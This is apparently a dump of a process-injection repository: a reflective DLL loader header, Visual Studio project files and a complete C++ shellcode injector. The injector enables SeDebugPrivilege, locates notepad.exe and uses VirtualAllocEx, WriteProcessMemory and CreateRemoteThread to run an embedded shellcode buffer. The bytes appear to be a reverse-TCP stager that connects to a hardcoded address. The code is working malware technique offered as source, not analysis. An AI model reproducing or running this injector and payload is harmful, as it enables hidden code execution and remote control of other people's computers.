133 | //DWORD dwSessionId;
134 | //ULARGE_INTEGER liAppCompatFlags;
135 | //ULARGE_INTEGER liAppCompatFlagsUser;
136 | //LPVOID lppShimData;
137 | //LPVOID lpAppCompatInfo;
138 | //UNICODE_STR usCSDVersion;
139 | //LPVOID lpActivationContextData;
140 | //LPVOID lpProcessAssemblyStorageMap;
141 | //LPVOID lpSystemDefaultActivationContextData;
142 | //LPVOID lpSystemAssemblyStorageMap;
143 | //DWORD dwMinimumStackCommit;
144 | BYTE Reserved1[2];
145 | BYTE BeingDebugged;
146 | BYTE Reserved2[21];
147 | PPEB_LDR_DATA pLdr;
148 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
149 | BYTE Reserved3[520];
150 | //PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
151 | BYTE Reserved4[136];
152 | ULONG SessionId;
153 | } _PEB, *_PPEB;
154 |
155 | // WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
156 | //__declspec( align(8) )
157 | typedef struct _LDR_DATA_TABLE_ENTRY
158 | {
159 | //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
160 | LIST_ENTRY InMemoryOrderModuleList;
161 | LIST_ENTRY InInitializationOrderModuleList;
162 | PVOID DllBase;
163 | PVOID EntryPoint;
164 | ULONG SizeOfImage;
165 | UNICODE_STR FullDllName;
166 | UNICODE_STR BaseDllName;
167 | ULONG Flags;
168 | SHORT LoadCount;
169 | SHORT TlsIndex;
170 | LIST_ENTRY HashTableEntry;
171 | ULONG TimeDateStamp;
172 | } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
173 |
174 |
175 |
176 | typedef struct
177 | {
178 | WORD offset : 12;
179 | WORD type : 4;
180 | } IMAGE_RELOC, *PIMAGE_RELOC;
181 | #ifdef __cplusplus
182 | extern "C" {
183 | #endif
184 |
185 | ULONG_PTR WINAPI ReflectiveLoader(ULONG_PTR callAddress);
186 |
187 | #ifdef __cplusplus
188 | }
189 | #endif
190 |
--------------------------------------------------------------------------------
/ReflectiveDLLPEForm/x64/Debug/Reflecti.3AD41A2B.tlog/unsuccessfulbuild:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLLPEForm/x64/Debug/Reflecti.3AD41A2B.tlog/unsuccessfulbuild
--------------------------------------------------------------------------------
/ReflectiveDLLPEForm/x64/Debug/ReflectiveDLLPEForm.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/ReflectiveDLLPEForm/x64/Release/ReflectiveDLLPEForm.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/ShellcodeInjection/ShellcodeInjection.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {45525617-1157-4230-8B6C-C559702469DF}
23 | Win32Proj
24 | ShellcodeInjection
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 |
84 |
85 |
86 |
87 |
88 | Level3
89 | Disabled
90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
91 | true
92 |
93 |
94 | Console
95 | true
96 |
97 |
98 |
99 |
100 |
101 |
102 | Level3
103 | Disabled
104 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
105 | true
106 |
107 |
108 | Console
109 | true
110 |
111 |
112 |
113 |
114 | Level3
115 |
116 |
117 | MaxSpeed
118 | true
119 | true
120 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
121 | true
122 |
123 |
124 | Console
125 | true
126 | true
127 | true
128 |
129 |
130 |
131 |
132 | Level3
133 |
134 |
135 | MaxSpeed
136 | true
137 | true
138 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
139 | true
140 |
141 |
142 | Console
143 | true
144 | true
145 | true
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
--------------------------------------------------------------------------------
/ShellcodeInjection/ShellcodeInjection.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/ShellcodeInjection/main.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | using namespace std;
5 | void PrivilegeEscalation()
6 | {
7 | HANDLE hToken;
8 | LUID luid;
9 | TOKEN_PRIVILEGES tp;
10 | OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
11 | LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid);
12 | tp.PrivilegeCount = 1;
13 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
14 | tp.Privileges[0].Luid = luid;
15 | AdjustTokenPrivileges(hToken, 0, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
16 | }
17 | DWORD m_WalkProcess(WCHAR *target_process_name)
18 | {
19 | HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
20 | if (INVALID_HANDLE_VALUE == hSnapshot)
21 | {
22 | return 0;
23 | }
24 | PROCESSENTRY32 pi;
25 | pi.dwSize = sizeof(PROCESSENTRY32);
26 | BOOL bRet = Process32First(hSnapshot, &pi);
27 | DWORD targetPid = 0;
28 | while (bRet)
29 | {
30 | //todo
31 |
32 | int res = wcscmp(pi.szExeFile, target_process_name);
33 | if (!res)
34 | return pi.th32ProcessID;
35 | bRet = Process32Next(hSnapshot, &pi);
36 | }
37 | return 0;
38 | }
39 | int main()
40 | {
41 | unsigned char buf[] =
42 | "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
43 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
44 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
45 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
46 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
47 | "\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"
48 | "\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b"
49 | "\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
50 | "\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1"
51 | "\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"
52 | "\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"
53 | "\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
54 | "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
55 | "\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
56 | "\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"
57 | "\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
58 | "\x49\xbc\x02\x00\x1f\x98\xc0\xa8\x0b\x89\x41\x54\x49\x89\xe4"
59 | "\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"
60 | "\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"
61 | "\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
62 | "\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"
63 | "\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"
64 | "\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"
65 | "\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
66 | "\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"
67 | "\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
68 | "\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
69 | "\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
70 | "\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
71 | "\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"
72 | "\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"
73 | "\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
74 | "\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
75 | "\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5";
76 |
77 | WCHAR *m_target_name = L"notepad.exe";
78 | DWORD m_target_id = m_WalkProcess(m_target_name);
79 | PrivilegeEscalation();
80 | HANDLE injectionProcessHandle = ::OpenProcess(PROCESS_ALL_ACCESS | PROCESS_CREATE_THREAD, 0, m_target_id);
81 | LPVOID AllocAddr = VirtualAllocEx(injectionProcessHandle, NULL, 1024, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
82 | WriteProcessMemory(injectionProcessHandle, AllocAddr, buf, 1024, NULL);
83 | DWORD ER = GetLastError();
84 | HANDLE hRemoteThread;
85 | if ((hRemoteThread = CreateRemoteThread(injectionProcessHandle, NULL, 0, (LPTHREAD_START_ROUTINE)AllocAddr, NULL, 0, NULL)) == NULL)
86 | {
87 | ER = GetLastError();
88 | cout << "Create Remote Thread Failed!" << endl;
89 | return FALSE;
90 | }
91 | system("pause");
92 | return 0;
93 | }
--------------------------------------------------------------------------------